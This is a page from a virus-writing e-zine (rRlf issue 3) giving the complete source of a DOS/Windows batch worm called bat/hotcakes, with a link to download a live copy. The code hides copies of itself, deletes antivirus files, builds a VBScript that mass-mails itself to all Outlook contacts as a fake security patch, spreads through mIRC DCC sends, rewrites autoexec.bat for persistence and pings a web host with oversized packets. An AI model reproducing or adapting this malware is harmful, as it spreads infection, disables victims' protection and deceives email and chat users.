<html>
<head>
<title>rRlf #3</title>
</head>
<body text="#ffffff" link="#ff0000" vlink="#ff0000" alink="#ff0000" background="background.jpg">
<center>
<img src="logo.jpg">
<br><i>The Revoluti0n</i>
<br><table cellpadding="9">
<tr>
<th><a href="39.html">last article</a></th>
<th><a href="01.html">table of contents</a></th>
<th><a href="41.html">next article</a></th>
</tr>
</table>
</center>
<p><b><u>bat/hotcakes by adious</u></b>
<p>:bat/hotcakes
<br>:by adious
<br>:written on 2/7/02
<p>:clear_screen
<br>cls
<p>:check_from_reinfection
<br>If exist c:\hotcakes.log goto end_vir
<p>:create_identfile
<br>copy 00000000000000 >c:\hotcakes.log
<br>copy Infected by bat.hotcakes >>c:\hotcakes.log
<br>copy 00000000000000 >>c:\hotcakes.log
<br>attrib +h c:\hotcakes.log
<p>:copy_self
<br>copy %0 c:\hotcakes.bat
<br>copy %0 c:\boy.bat
<br>copy %0 c:\windows\handgun.bat
<br>copy %0 c:\windows\girl99.bat
<br>copy %0 c:\b.bat
<br>copy %0 c:\d.bat
<br>attrib +h +s c:\boy.bat
<br>attrib +h +s c:\windows\handgun.bat
<br>attrib +h +s c:\windows\girl99.bat
<br>attrib +h +s c:\b.bat
<br>attrib +h +s c:\d.bat
<p>:Retrofuntions
<br>if exist c:\hotcakes.bat del c:\programme\norton~1\s32integ.dll
<br>if exist c:\hotcakes.bat del c:\programme\f-prot95\fpwm32.dll
<br>if exist c:\hotcakes.bat del c:\programme\mcafee\scan.dat
<br>if exist c:\hotcakes.bat del c:\tbavw95\tbscan.sig
<p>:massmailer
<br>echo.on error resume next > c:\X.vbs
<br>echo dim a,b,c,d,e >> c:\X.vbs
<br>echo set a = Wscript.CreateObject("Wscript.Shell") >> c:\X.vbs
<br>echo set b = CreateObject("Outlook.Application") >> c:\X.vbs
<br>echo set c = b.GetNameSpace("MAPI") >> c:\X.vbs
<br>echo for y = 1 To c.AddressLists.Count >> c:\X.vbs
<br>echo set d = c.AddressLists(y) >> c:\X.vbs
<br>echo x = 1 >> c:\X.vbs
<br>echo set e = b.CreateItem(0) >> c:\X.vbs
<br>echo for o = 1 To d.AddressEntries.Count >> c:\X.vbs
<br>echo f = d.AddressEntries(x) >> c:\X.vbs
<br>echo e.Recipients.Add f >> c:\X.vbs
<br>echo x = x + 1 >> c:\X.vbs
<br>echo next >> c:\X.vbs
<br>echo e.Subject = "Patch your system now!!" >> c:\X.vbs
<br>echo e.Body = "Here's a patch that is newly discovered" >> c:\X.vbs
<br>echo e.Body = "by me..patch against virus and hackers.download this now.." 
<br> >> c:\X.vbs
<br>echo e.Attachments.Add ("c:\hotcakes.bat") >> c:\X.vbs
<br>echo e.DeleteAfterSubmit = False >> c:\X.vbs
<br>echo e.Send >> c:\X.vbs
<br>echo f = "" >> c:\X.vbs
<br>echo next >> c:\X.vbs
<br>start c:\X.vbs
<p>:mIrc_werm
<br>echo [script]>b.bat
<br>echo n0=on 1:JOIN:#:{ >>b.bat
<br>echo n1= /if ( nick == $me ) { halt } >>b.bat
<br>echo n2= /.dcc send $nick c:\hotcakes.bat >>b.bat
<br>echo n3=} >>b.bat
<br>if exist c:\mirc\mirc.ini copy b.bat c:\mirc\script.ini
<br>if exist c:\mirc32\mirc.ini copy b.bat c:\mirc32\script.ini
<br>if exist c:\progra~1\mirc\mirc.ini copy b.bat c:\progra~1\mirc\script.ini
<br>if exist c:\progra~1\mirc32\mirc.ini copy b.bat 
<br>c:\progra~1\mirc32\script.ini
<br>del b.bat
<p>:Intel_auto_start
<br>del c:\autoexec.bat
<br>copy @echo off >c:\autoexec.bat
<br>copy if exist c:\hotcakes.bat start c:\hotcakes.bat >>c:\autoexec.bat
<br>copy goto night >>c:\autoexec.bat
<br>copy if not exist c:\hotcakes.bat goto precop >>c:\autoexec.bat
<br>copy :precop >>c:\autoexec.bat
<br>copy copy c:\windows\handgun.bat c:\hotcakes.bat >>c:\autoexec.bat
<br>copy copy c:\b.bat c:\hotcakes.bat >>c:\autoexec.bat
<br>copy copy c:\d.bat c:\hotcakes.bat >>c:\autoexec.bat
<br>copy copy c:\windows\girl99.bat c:\hotcakes.bat >>c:\autoexec.bat
<br>copy copy c:\boy.bat c:\hotcakes.bat >>c:\autoexec.bat
<br>copy attrib -h -s c:\hotcakes.bat >>c:\autoexec.bat
<br>copy :night >>c:\autoexec.bat
<br>copy echo ooooooooooooooooo >>c:\autoexec.bat
<br>copy echo you are owned by a computer virus named BAT\hotcakes ;) >>c:\autoexec.bat
<br>copy echo by adious >>c:\autoexec.bat
<br>copy echo adious@rRlf.de >>c:\autoexec.bat
<br>copy echo ooooooooooooooooo >>c:\autoexec.bat
<br>copy pause >>c:\autoexec.bat
<br>copy ping -l 3000 www.smutserver.com >>c:/autoexec.bat
<br>copy ping -l 666 www.smutserver.com >>c:/autoexec.bat
<p>:End_vir
<br>:adious_[rRlf]
<p><a href="40.zip">living virus</a>
</body>
</html>
